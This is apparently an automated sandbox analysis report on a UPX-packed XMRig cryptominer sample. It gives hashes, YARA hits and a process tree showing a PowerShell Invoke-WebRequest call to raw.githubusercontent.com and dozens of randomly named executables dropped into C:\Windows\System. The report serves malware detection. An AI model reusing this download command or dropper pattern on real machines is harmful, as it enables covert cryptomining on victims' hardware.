xmrig | f66bf46365b5a3137f2d5675faec53ac30b76cc32a6468fc1a6678c63b0dcb5e

Analysis

max time kernel
147s
max time network
147s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
12/03/2024, 03:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f66bf46365b5a3137f2d5675faec53ac30b76cc32a6468fc1a6678c63b0dcb5e.exe
Size

3.2MB
MD5

187278c747fb285e36ce6d870af52318
SHA1

869a0fd303cdfbdd52473bc8ffbe78e2fd065401
SHA256

f66bf46365b5a3137f2d5675faec53ac30b76cc32a6468fc1a6678c63b0dcb5e
SHA512

6aecba5804e258ef5fe1222272860e73ac77e63fbd0007e9dae8596b2a6d1da7311de70f294f0f4a7f8f5b7f42980b4f9261a2f0be4bb69acd62a23c3552c2e2
SSDEEP

98304:S1ONtyBeSFkXV1etEKLlWUTOfeiRA2R76zHrWx:SbBeSFkt

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detects executables containing URLs to raw contents of a Github gist 50 IoCs

resource	yara_rule
behavioral1/memory/2872-0-0x000000013F410000-0x000000013F806000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/files/0x00070000000120e4-3.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/files/0x00070000000120e4-6.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/3012-9-0x000000013FED0000-0x00000001402C6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/files/0x000e000000015a98-10.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/files/0x000e000000015a98-13.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/files/0x0008000000015c87-20.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2516-40-0x000000013F530000-0x000000013F926000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/files/0x0010000000015c5d-53.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/files/0x0006000000018ae2-59.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/files/0x0006000000018b4a-78.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/files/0x0006000000018b73-96.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/files/0x0006000000018b96-104.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/files/0x0006000000018b96-101.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2600-100-0x000000013F580000-0x000000013F976000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/files/0x0006000000018ba2-108.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/files/0x000500000001939b-147.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/files/0x0005000000019377-139.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/files/0x0005000000019485-176.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2784-469-0x000000013FF80000-0x0000000140376000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2952-538-0x000000013FDF0000-0x00000001401E6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1476-626-0x000000013FFA0000-0x0000000140396000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1976-765-0x000000013FA40000-0x000000013FE36000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2388-363-0x000000013F940000-0x000000013FD36000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2712-835-0x000000013F5E0000-0x000000013F9D6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2972-890-0x000000013F310000-0x000000013F706000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1608-887-0x000000013FA00000-0x000000013FDF6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2292-965-0x000000013F260000-0x000000013F656000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1516-993-0x000000013F250000-0x000000013F646000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2900-988-0x000000013F570000-0x000000013F966000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2652-972-0x000000013F8E0000-0x000000013FCD6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2096-967-0x000000013F310000-0x000000013F706000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1748-964-0x000000013F3E0000-0x000000013F7D6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1088-1015-0x000000013FC00000-0x000000013FFF6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2216-1014-0x000000013F580000-0x000000013F976000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1652-963-0x000000013FF00000-0x00000001402F6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2664-941-0x000000013FD10000-0x0000000140106000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1500-940-0x000000013F6A0000-0x000000013FA96000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1644-939-0x000000013FDD0000-0x00000001401C6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2436-913-0x000000013F120000-0x000000013F516000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2240-912-0x000000013F0D0000-0x000000013F4C6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2952-883-0x000000013FDF0000-0x00000001401E6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/784-886-0x000000013FDD0000-0x00000001401C6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1976-863-0x000000013FA40000-0x000000013FE36000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1476-862-0x000000013FFA0000-0x0000000140396000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2548-858-0x000000013F820000-0x000000013FC16000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2600-857-0x000000013F580000-0x000000013F976000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2148-885-0x000000013FC40000-0x0000000140036000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1796-882-0x000000013F5D0000-0x000000013F9C6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2516-855-0x000000013F530000-0x000000013F926000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL

UPX dump on OEP (original entry point) 50 IoCs

resource	yara_rule
behavioral1/memory/2872-0-0x000000013F410000-0x000000013F806000-memory.dmp	UPX
behavioral1/files/0x00070000000120e4-3.dat	UPX
behavioral1/files/0x00070000000120e4-6.dat	UPX
behavioral1/memory/3012-9-0x000000013FED0000-0x00000001402C6000-memory.dmp	UPX
behavioral1/files/0x000e000000015a98-10.dat	UPX
behavioral1/files/0x000e000000015a98-13.dat	UPX
behavioral1/files/0x0008000000015c87-20.dat	UPX
behavioral1/memory/2516-40-0x000000013F530000-0x000000013F926000-memory.dmp	UPX
behavioral1/files/0x0010000000015c5d-53.dat	UPX
behavioral1/files/0x0006000000018ae2-59.dat	UPX
behavioral1/files/0x0006000000018b4a-78.dat	UPX
behavioral1/files/0x0006000000018b73-96.dat	UPX
behavioral1/files/0x0006000000018b96-104.dat	UPX
behavioral1/files/0x0006000000018b96-101.dat	UPX
behavioral1/memory/2600-100-0x000000013F580000-0x000000013F976000-memory.dmp	UPX
behavioral1/files/0x0006000000018ba2-108.dat	UPX
behavioral1/files/0x000500000001939b-147.dat	UPX
behavioral1/files/0x0005000000019377-139.dat	UPX
behavioral1/files/0x0005000000019485-176.dat	UPX
behavioral1/memory/2784-469-0x000000013FF80000-0x0000000140376000-memory.dmp	UPX
behavioral1/memory/2952-538-0x000000013FDF0000-0x00000001401E6000-memory.dmp	UPX
behavioral1/memory/1476-626-0x000000013FFA0000-0x0000000140396000-memory.dmp	UPX
behavioral1/memory/1976-765-0x000000013FA40000-0x000000013FE36000-memory.dmp	UPX
behavioral1/memory/2388-363-0x000000013F940000-0x000000013FD36000-memory.dmp	UPX
behavioral1/memory/2712-835-0x000000013F5E0000-0x000000013F9D6000-memory.dmp	UPX
behavioral1/memory/2972-890-0x000000013F310000-0x000000013F706000-memory.dmp	UPX
behavioral1/memory/1608-887-0x000000013FA00000-0x000000013FDF6000-memory.dmp	UPX
behavioral1/memory/2292-965-0x000000013F260000-0x000000013F656000-memory.dmp	UPX
behavioral1/memory/1516-993-0x000000013F250000-0x000000013F646000-memory.dmp	UPX
behavioral1/memory/2900-988-0x000000013F570000-0x000000013F966000-memory.dmp	UPX
behavioral1/memory/2652-972-0x000000013F8E0000-0x000000013FCD6000-memory.dmp	UPX
behavioral1/memory/2096-967-0x000000013F310000-0x000000013F706000-memory.dmp	UPX
behavioral1/memory/1748-964-0x000000013F3E0000-0x000000013F7D6000-memory.dmp	UPX
behavioral1/memory/1088-1015-0x000000013FC00000-0x000000013FFF6000-memory.dmp	UPX
behavioral1/memory/2216-1014-0x000000013F580000-0x000000013F976000-memory.dmp	UPX
behavioral1/memory/1652-963-0x000000013FF00000-0x00000001402F6000-memory.dmp	UPX
behavioral1/memory/2664-941-0x000000013FD10000-0x0000000140106000-memory.dmp	UPX
behavioral1/memory/1500-940-0x000000013F6A0000-0x000000013FA96000-memory.dmp	UPX
behavioral1/memory/1644-939-0x000000013FDD0000-0x00000001401C6000-memory.dmp	UPX
behavioral1/memory/2436-913-0x000000013F120000-0x000000013F516000-memory.dmp	UPX
behavioral1/memory/2240-912-0x000000013F0D0000-0x000000013F4C6000-memory.dmp	UPX
behavioral1/memory/2952-883-0x000000013FDF0000-0x00000001401E6000-memory.dmp	UPX
behavioral1/memory/784-886-0x000000013FDD0000-0x00000001401C6000-memory.dmp	UPX
behavioral1/memory/1976-863-0x000000013FA40000-0x000000013FE36000-memory.dmp	UPX
behavioral1/memory/1476-862-0x000000013FFA0000-0x0000000140396000-memory.dmp	UPX
behavioral1/memory/2548-858-0x000000013F820000-0x000000013FC16000-memory.dmp	UPX
behavioral1/memory/2600-857-0x000000013F580000-0x000000013F976000-memory.dmp	UPX
behavioral1/memory/2148-885-0x000000013FC40000-0x0000000140036000-memory.dmp	UPX
behavioral1/memory/1796-882-0x000000013F5D0000-0x000000013F9C6000-memory.dmp	UPX
behavioral1/memory/2516-855-0x000000013F530000-0x000000013F926000-memory.dmp	UPX

XMRig Miner payload 51 IoCs

miner

resource	yara_rule
behavioral1/memory/2872-0-0x000000013F410000-0x000000013F806000-memory.dmp	xmrig
behavioral1/files/0x00070000000120e4-3.dat	xmrig
behavioral1/files/0x00070000000120e4-6.dat	xmrig
behavioral1/memory/3012-9-0x000000013FED0000-0x00000001402C6000-memory.dmp	xmrig
behavioral1/files/0x000e000000015a98-10.dat	xmrig
behavioral1/files/0x000e000000015a98-13.dat	xmrig
behavioral1/files/0x0008000000015c87-20.dat	xmrig
behavioral1/memory/2516-40-0x000000013F530000-0x000000013F926000-memory.dmp	xmrig
behavioral1/files/0x0010000000015c5d-53.dat	xmrig
behavioral1/files/0x0006000000018ae2-59.dat	xmrig
behavioral1/files/0x0006000000018b4a-78.dat	xmrig
behavioral1/files/0x0006000000018b73-96.dat	xmrig
behavioral1/files/0x0006000000018b96-104.dat	xmrig
behavioral1/files/0x0006000000018b96-101.dat	xmrig
behavioral1/memory/2600-100-0x000000013F580000-0x000000013F976000-memory.dmp	xmrig
behavioral1/files/0x0006000000018ba2-108.dat	xmrig
behavioral1/files/0x000500000001939b-147.dat	xmrig
behavioral1/files/0x0005000000019377-139.dat	xmrig
behavioral1/files/0x0005000000019485-176.dat	xmrig
behavioral1/memory/2784-469-0x000000013FF80000-0x0000000140376000-memory.dmp	xmrig
behavioral1/memory/2952-538-0x000000013FDF0000-0x00000001401E6000-memory.dmp	xmrig
behavioral1/memory/1476-626-0x000000013FFA0000-0x0000000140396000-memory.dmp	xmrig
behavioral1/memory/1976-765-0x000000013FA40000-0x000000013FE36000-memory.dmp	xmrig
behavioral1/memory/2388-363-0x000000013F940000-0x000000013FD36000-memory.dmp	xmrig
behavioral1/memory/2712-835-0x000000013F5E0000-0x000000013F9D6000-memory.dmp	xmrig
behavioral1/memory/2972-890-0x000000013F310000-0x000000013F706000-memory.dmp	xmrig
behavioral1/memory/1608-887-0x000000013FA00000-0x000000013FDF6000-memory.dmp	xmrig
behavioral1/memory/2292-965-0x000000013F260000-0x000000013F656000-memory.dmp	xmrig
behavioral1/memory/1516-993-0x000000013F250000-0x000000013F646000-memory.dmp	xmrig
behavioral1/memory/2900-988-0x000000013F570000-0x000000013F966000-memory.dmp	xmrig
behavioral1/memory/2652-972-0x000000013F8E0000-0x000000013FCD6000-memory.dmp	xmrig
behavioral1/memory/2096-967-0x000000013F310000-0x000000013F706000-memory.dmp	xmrig
behavioral1/memory/1748-964-0x000000013F3E0000-0x000000013F7D6000-memory.dmp	xmrig
behavioral1/memory/1088-1015-0x000000013FC00000-0x000000013FFF6000-memory.dmp	xmrig
behavioral1/memory/2216-1014-0x000000013F580000-0x000000013F976000-memory.dmp	xmrig
behavioral1/memory/1652-963-0x000000013FF00000-0x00000001402F6000-memory.dmp	xmrig
behavioral1/memory/2664-941-0x000000013FD10000-0x0000000140106000-memory.dmp	xmrig
behavioral1/memory/1500-940-0x000000013F6A0000-0x000000013FA96000-memory.dmp	xmrig
behavioral1/memory/1644-939-0x000000013FDD0000-0x00000001401C6000-memory.dmp	xmrig
behavioral1/memory/2436-913-0x000000013F120000-0x000000013F516000-memory.dmp	xmrig
behavioral1/memory/2872-914-0x0000000004470000-0x0000000004866000-memory.dmp	xmrig
behavioral1/memory/2240-912-0x000000013F0D0000-0x000000013F4C6000-memory.dmp	xmrig
behavioral1/memory/2952-883-0x000000013FDF0000-0x00000001401E6000-memory.dmp	xmrig
behavioral1/memory/784-886-0x000000013FDD0000-0x00000001401C6000-memory.dmp	xmrig
behavioral1/memory/1976-863-0x000000013FA40000-0x000000013FE36000-memory.dmp	xmrig
behavioral1/memory/1476-862-0x000000013FFA0000-0x0000000140396000-memory.dmp	xmrig
behavioral1/memory/2548-858-0x000000013F820000-0x000000013FC16000-memory.dmp	xmrig
behavioral1/memory/2600-857-0x000000013F580000-0x000000013F976000-memory.dmp	xmrig
behavioral1/memory/2148-885-0x000000013FC40000-0x0000000140036000-memory.dmp	xmrig
behavioral1/memory/1796-882-0x000000013F5D0000-0x000000013F9C6000-memory.dmp	xmrig
behavioral1/memory/2516-855-0x000000013F530000-0x000000013F926000-memory.dmp	xmrig

UPX packed file 50 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2872-0-0x000000013F410000-0x000000013F806000-memory.dmp	upx
behavioral1/files/0x00070000000120e4-3.dat	upx
behavioral1/files/0x00070000000120e4-6.dat	upx
behavioral1/memory/3012-9-0x000000013FED0000-0x00000001402C6000-memory.dmp	upx
behavioral1/files/0x000e000000015a98-10.dat	upx
behavioral1/files/0x000e000000015a98-13.dat	upx
behavioral1/files/0x0008000000015c87-20.dat	upx
behavioral1/memory/2516-40-0x000000013F530000-0x000000013F926000-memory.dmp	upx
behavioral1/files/0x0010000000015c5d-53.dat	upx
behavioral1/files/0x0006000000018ae2-59.dat	upx
behavioral1/files/0x0006000000018b4a-78.dat	upx
behavioral1/files/0x0006000000018b73-96.dat	upx
behavioral1/files/0x0006000000018b96-104.dat	upx
behavioral1/files/0x0006000000018b96-101.dat	upx
behavioral1/memory/2600-100-0x000000013F580000-0x000000013F976000-memory.dmp	upx
behavioral1/files/0x0006000000018ba2-108.dat	upx
behavioral1/files/0x000500000001939b-147.dat	upx
behavioral1/files/0x0005000000019377-139.dat	upx
behavioral1/files/0x0005000000019485-176.dat	upx
behavioral1/memory/2784-469-0x000000013FF80000-0x0000000140376000-memory.dmp	upx
behavioral1/memory/2952-538-0x000000013FDF0000-0x00000001401E6000-memory.dmp	upx
behavioral1/memory/1476-626-0x000000013FFA0000-0x0000000140396000-memory.dmp	upx
behavioral1/memory/1976-765-0x000000013FA40000-0x000000013FE36000-memory.dmp	upx
behavioral1/memory/2388-363-0x000000013F940000-0x000000013FD36000-memory.dmp	upx
behavioral1/memory/2712-835-0x000000013F5E0000-0x000000013F9D6000-memory.dmp	upx
behavioral1/memory/2972-890-0x000000013F310000-0x000000013F706000-memory.dmp	upx
behavioral1/memory/1608-887-0x000000013FA00000-0x000000013FDF6000-memory.dmp	upx
behavioral1/memory/2292-965-0x000000013F260000-0x000000013F656000-memory.dmp	upx
behavioral1/memory/1516-993-0x000000013F250000-0x000000013F646000-memory.dmp	upx
behavioral1/memory/2900-988-0x000000013F570000-0x000000013F966000-memory.dmp	upx
behavioral1/memory/2652-972-0x000000013F8E0000-0x000000013FCD6000-memory.dmp	upx
behavioral1/memory/2096-967-0x000000013F310000-0x000000013F706000-memory.dmp	upx
behavioral1/memory/1748-964-0x000000013F3E0000-0x000000013F7D6000-memory.dmp	upx
behavioral1/memory/1088-1015-0x000000013FC00000-0x000000013FFF6000-memory.dmp	upx
behavioral1/memory/2216-1014-0x000000013F580000-0x000000013F976000-memory.dmp	upx
behavioral1/memory/1652-963-0x000000013FF00000-0x00000001402F6000-memory.dmp	upx
behavioral1/memory/2664-941-0x000000013FD10000-0x0000000140106000-memory.dmp	upx
behavioral1/memory/1500-940-0x000000013F6A0000-0x000000013FA96000-memory.dmp	upx
behavioral1/memory/1644-939-0x000000013FDD0000-0x00000001401C6000-memory.dmp	upx
behavioral1/memory/2436-913-0x000000013F120000-0x000000013F516000-memory.dmp	upx
behavioral1/memory/2240-912-0x000000013F0D0000-0x000000013F4C6000-memory.dmp	upx
behavioral1/memory/2952-883-0x000000013FDF0000-0x00000001401E6000-memory.dmp	upx
behavioral1/memory/784-886-0x000000013FDD0000-0x00000001401C6000-memory.dmp	upx
behavioral1/memory/1976-863-0x000000013FA40000-0x000000013FE36000-memory.dmp	upx
behavioral1/memory/1476-862-0x000000013FFA0000-0x0000000140396000-memory.dmp	upx
behavioral1/memory/2548-858-0x000000013F820000-0x000000013FC16000-memory.dmp	upx
behavioral1/memory/2600-857-0x000000013F580000-0x000000013F976000-memory.dmp	upx
behavioral1/memory/2148-885-0x000000013FC40000-0x0000000140036000-memory.dmp	upx
behavioral1/memory/1796-882-0x000000013F5D0000-0x000000013F9C6000-memory.dmp	upx
behavioral1/memory/2516-855-0x000000013F530000-0x000000013F926000-memory.dmp	upx

C:\Users\Admin\AppData\Local\Temp\f66bf46365b5a3137f2d5675faec53ac30b76cc32a6468fc1a6678c63b0dcb5e.exe
"C:\Users\Admin\AppData\Local\Temp\f66bf46365b5a3137f2d5675faec53ac30b76cc32a6468fc1a6678c63b0dcb5e.exe"
1⤵
PID:2872
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  PID:3028
- C:\Windows\System\TWcGqGl.exe
  C:\Windows\System\TWcGqGl.exe
  2⤵
  PID:3012
- C:\Windows\System\tGkmUBM.exe
  C:\Windows\System\tGkmUBM.exe
  2⤵
  PID:2516
- C:\Windows\System\DsbEKdB.exe
  C:\Windows\System\DsbEKdB.exe
  2⤵
  PID:2600
- C:\Windows\System\SukMIQw.exe
  C:\Windows\System\SukMIQw.exe
  2⤵
  PID:2712
- C:\Windows\System\MbaXAAZ.exe
  C:\Windows\System\MbaXAAZ.exe
  2⤵
  PID:2548
- C:\Windows\System\GosiVLD.exe
  C:\Windows\System\GosiVLD.exe
  2⤵
  PID:1476
- C:\Windows\System\nlrfWhB.exe
  C:\Windows\System\nlrfWhB.exe
  2⤵
  PID:1652
- C:\Windows\System\PJICVMR.exe
  C:\Windows\System\PJICVMR.exe
  2⤵
  PID:2984
- C:\Windows\System\TWTvdHc.exe
  C:\Windows\System\TWTvdHc.exe
  2⤵
  PID:1784
- C:\Windows\System\PkjxTzD.exe
  C:\Windows\System\PkjxTzD.exe
  2⤵
  PID:828
- C:\Windows\System\GmXpwad.exe
  C:\Windows\System\GmXpwad.exe
  2⤵
  PID:1616
- C:\Windows\System\bHtKjIs.exe
  C:\Windows\System\bHtKjIs.exe
  2⤵
  PID:1912
- C:\Windows\System\XtNuBVR.exe
  C:\Windows\System\XtNuBVR.exe
  2⤵
  PID:2884
- C:\Windows\System\pDyKlpz.exe
  C:\Windows\System\pDyKlpz.exe
  2⤵
  PID:2900
- C:\Windows\System\ZbPMjrm.exe
  C:\Windows\System\ZbPMjrm.exe
  2⤵
  PID:2004
- C:\Windows\System\YbKkczb.exe
  C:\Windows\System\YbKkczb.exe
  2⤵
  PID:1220
- C:\Windows\System\jGKNUmX.exe
  C:\Windows\System\jGKNUmX.exe
  2⤵
  PID:1812
- C:\Windows\System\njxVumw.exe
  C:\Windows\System\njxVumw.exe
  2⤵
  PID:876
- C:\Windows\System\euziDXf.exe
  C:\Windows\System\euziDXf.exe
  2⤵
  PID:1572
- C:\Windows\System\CqAMInZ.exe
  C:\Windows\System\CqAMInZ.exe
  2⤵
  PID:2628
- C:\Windows\System\IDpzlUn.exe
  C:\Windows\System\IDpzlUn.exe
  2⤵
  PID:1768
- C:\Windows\System\UunYoJB.exe
  C:\Windows\System\UunYoJB.exe
  2⤵
  PID:564
- C:\Windows\System\LQdoSxZ.exe
  C:\Windows\System\LQdoSxZ.exe
  2⤵
  PID:2404
- C:\Windows\System\IzmJYyT.exe
  C:\Windows\System\IzmJYyT.exe
  2⤵
  PID:2788
- C:\Windows\System\DhTpvwX.exe
  C:\Windows\System\DhTpvwX.exe
  2⤵
  PID:2280
- C:\Windows\System\cOvZSHr.exe
  C:\Windows\System\cOvZSHr.exe
  2⤵
  PID:2820
- C:\Windows\System\JjPJHqY.exe
  C:\Windows\System\JjPJHqY.exe
  2⤵
  PID:2412
- C:\Windows\System\ejRRtgp.exe
  C:\Windows\System\ejRRtgp.exe
  2⤵
  PID:1016
- C:\Windows\System\TJUasIS.exe
  C:\Windows\System\TJUasIS.exe
  2⤵
  PID:2856
- C:\Windows\System\BOJspqw.exe
  C:\Windows\System\BOJspqw.exe
  2⤵
  PID:1980
- C:\Windows\System\LvRyadD.exe
  C:\Windows\System\LvRyadD.exe
  2⤵
  PID:1808
- C:\Windows\System\TGqwkea.exe
  C:\Windows\System\TGqwkea.exe
  2⤵
  PID:2136
- C:\Windows\System\PgEWZuv.exe
  C:\Windows\System\PgEWZuv.exe
  2⤵
  PID:1436
- C:\Windows\System\wNZkfSx.exe
  C:\Windows\System\wNZkfSx.exe
  2⤵
  PID:2340
- C:\Windows\System\yKPscZi.exe
  C:\Windows\System\yKPscZi.exe
  2⤵
  PID:1664
- C:\Windows\System\IhhzTLE.exe
  C:\Windows\System\IhhzTLE.exe
  2⤵
  PID:2836
- C:\Windows\System\uvCjkEF.exe
  C:\Windows\System\uvCjkEF.exe
  2⤵
  PID:2528
- C:\Windows\System\tywGgbl.exe
  C:\Windows\System\tywGgbl.exe
  2⤵
  PID:844
- C:\Windows\System\YIComSn.exe
  C:\Windows\System\YIComSn.exe
  2⤵
  PID:1096
- C:\Windows\System\YybwQjf.exe
  C:\Windows\System\YybwQjf.exe
  2⤵
  PID:2208
- C:\Windows\System\VVVoEYg.exe
  C:\Windows\System\VVVoEYg.exe
  2⤵
  PID:1012
- C:\Windows\System\omjdSXb.exe
  C:\Windows\System\omjdSXb.exe
  2⤵
  PID:2244
- C:\Windows\System\WBNAeFo.exe
  C:\Windows\System\WBNAeFo.exe
  2⤵
  PID:2088
- C:\Windows\System\PGuyjCP.exe
  C:\Windows\System\PGuyjCP.exe
  2⤵
  PID:2036
- C:\Windows\System\xxAsLWG.exe
  C:\Windows\System\xxAsLWG.exe
  2⤵
  PID:1208
- C:\Windows\System\MfnyNKn.exe
  C:\Windows\System\MfnyNKn.exe
  2⤵
  PID:1496
- C:\Windows\System\AscgyWB.exe
  C:\Windows\System\AscgyWB.exe
  2⤵
  PID:860
- C:\Windows\System\WXUOtBA.exe
  C:\Windows\System\WXUOtBA.exe
  2⤵
  PID:2256
- C:\Windows\System\skVMxBy.exe
  C:\Windows\System\skVMxBy.exe
  2⤵
  PID:2296
- C:\Windows\System\pfpdlDx.exe
  C:\Windows\System\pfpdlDx.exe
  2⤵
  PID:1520
- C:\Windows\System\fJSJFjT.exe
  C:\Windows\System\fJSJFjT.exe
  2⤵
  PID:2980
- C:\Windows\System\NEoAveU.exe
  C:\Windows\System\NEoAveU.exe
  2⤵
  PID:2304
- C:\Windows\System\qESaNLw.exe
  C:\Windows\System\qESaNLw.exe
  2⤵
  PID:752
- C:\Windows\System\xxSalJz.exe
  C:\Windows\System\xxSalJz.exe
  2⤵
  PID:2116
- C:\Windows\System\yLpoVwg.exe
  C:\Windows\System\yLpoVwg.exe
  2⤵
  PID:1316
- C:\Windows\System\jeSArCE.exe
  C:\Windows\System\jeSArCE.exe
  2⤵
  PID:2608
- C:\Windows\System\KeZDARo.exe
  C:\Windows\System\KeZDARo.exe
  2⤵
  PID:2400
- C:\Windows\System\ZaCWSgf.exe
  C:\Windows\System\ZaCWSgf.exe
  2⤵
  PID:2312
- C:\Windows\System\RScMuPh.exe
  C:\Windows\System\RScMuPh.exe
  2⤵
  PID:1228
- C:\Windows\System\mRcvuBl.exe
  C:\Windows\System\mRcvuBl.exe
  2⤵
  PID:3068
- C:\Windows\System\VTBnyIc.exe
  C:\Windows\System\VTBnyIc.exe
  2⤵
  PID:608
- C:\Windows\System\zrasMOi.exe
  C:\Windows\System\zrasMOi.exe
  2⤵
  PID:684
- C:\Windows\System\opxXaxO.exe
  C:\Windows\System\opxXaxO.exe
  2⤵
  PID:3048
- C:\Windows\System\lLYvKwh.exe
  C:\Windows\System\lLYvKwh.exe
  2⤵
  PID:2976
- C:\Windows\System\pWoBNFH.exe
  C:\Windows\System\pWoBNFH.exe
  2⤵
  PID:2040
- C:\Windows\System\kasrtgQ.exe
  C:\Windows\System\kasrtgQ.exe
  2⤵
  PID:268
- C:\Windows\System\scSGUpB.exe
  C:\Windows\System\scSGUpB.exe
  2⤵
  PID:524
- C:\Windows\System\XpjnyUD.exe
  C:\Windows\System\XpjnyUD.exe
  2⤵
  PID:1620
- C:\Windows\System\QwKiBUS.exe
  C:\Windows\System\QwKiBUS.exe
  2⤵
  PID:2476
- C:\Windows\System\siLuYIi.exe
  C:\Windows\System\siLuYIi.exe
  2⤵
  PID:2692
- C:\Windows\System\eHVNCjx.exe
  C:\Windows\System\eHVNCjx.exe
  2⤵
  PID:1984
- C:\Windows\System\bbPRJac.exe
  C:\Windows\System\bbPRJac.exe
  2⤵
  PID:1396
- C:\Windows\System\vVwuBDO.exe
  C:\Windows\System\vVwuBDO.exe
  2⤵
  PID:472
- C:\Windows\System\Exupeou.exe
  C:\Windows\System\Exupeou.exe
  2⤵
  PID:3044
- C:\Windows\System\xpKCkBA.exe
  C:\Windows\System\xpKCkBA.exe
  2⤵
  PID:3088
- C:\Windows\System\CQfFAfP.exe
  C:\Windows\System\CQfFAfP.exe
  2⤵
  PID:3152
- C:\Windows\System\iVViFVe.exe
  C:\Windows\System\iVViFVe.exe
  2⤵
  PID:3180
- C:\Windows\System\DqTpCDe.exe
  C:\Windows\System\DqTpCDe.exe
  2⤵
  PID:3196
- C:\Windows\System\vNGzyAF.exe
  C:\Windows\System\vNGzyAF.exe
  2⤵
  PID:3212
- C:\Windows\System\jCYfCdg.exe
  C:\Windows\System\jCYfCdg.exe
  2⤵
  PID:3232
- C:\Windows\System\ujbPzZU.exe
  C:\Windows\System\ujbPzZU.exe
  2⤵
  PID:3248
- C:\Windows\System\lFrWcvz.exe
  C:\Windows\System\lFrWcvz.exe
  2⤵
  PID:3264
- C:\Windows\System\YHdIZTL.exe
  C:\Windows\System\YHdIZTL.exe
  2⤵
  PID:3304
- C:\Windows\System\CFGrOwb.exe
  C:\Windows\System\CFGrOwb.exe
  2⤵
  PID:3320
- C:\Windows\System\bAlMGOb.exe
  C:\Windows\System\bAlMGOb.exe
  2⤵
  PID:3336
- C:\Windows\System\fIfONkt.exe
  C:\Windows\System\fIfONkt.exe
  2⤵
  PID:3356
- C:\Windows\System\sMlXusO.exe
  C:\Windows\System\sMlXusO.exe
  2⤵
  PID:3372
- C:\Windows\System\mwNitrA.exe
  C:\Windows\System\mwNitrA.exe
  2⤵
  PID:3388
